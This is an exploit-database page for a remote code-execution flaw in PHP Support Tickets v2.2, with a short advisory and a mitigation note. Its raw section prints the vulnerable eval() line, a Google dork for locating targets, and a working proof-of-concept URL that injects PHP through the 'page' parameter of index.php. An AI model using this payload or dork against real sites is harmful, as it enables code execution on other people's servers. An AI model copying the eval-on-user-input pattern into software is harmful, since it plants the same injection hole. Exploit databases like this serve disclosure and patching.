header-logo
Suggest Exploit
vendor:
PHP Support Tickets
by:
brain[pillow]
7.5
CVSS
HIGH
Code Execution
78
CWE
Product Name: PHP Support Tickets
Affected Version From: 2.2
Affected Version To: 2.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2010

PHP Support Tickets v2.2 Code Exec

This exploit allows an attacker to execute arbitrary code on a PHP Support Tickets v2.2 system. By manipulating the 'page' parameter in the 'index.php' file, an attacker can inject PHP code and execute it.

Mitigation:

Upgrade to a newer version of PHP Support Tickets that has patched this vulnerability. Additionally, ensure that user input is properly validated and sanitized before being used in code execution.
Source

Exploit-DB raw data:

# Exploit Title: PHP Support Tickets v2.2 Code Exec
# Google Dork: "PHP Support Tickets v2.2"
# Date: 26.09.2010
# Author: brain[pillow]
# Software Link: http://www.phpsupporttickets.com/
# Version: 2.2

====================================================================
# Vuln. code:

/classes/GUI/abstract.GUI.php 

    public function getPageName() { 
        return eval('return PHPST_PAGENAME_' . strtoupper($this->page) . ';'); 
    } 

====================================================================
# Exploit:

/index.php?page=xek();function PHPST_PAGENAME_XEK(){phpinfo();}

Navigation

Suggest Exploit

Services By CQR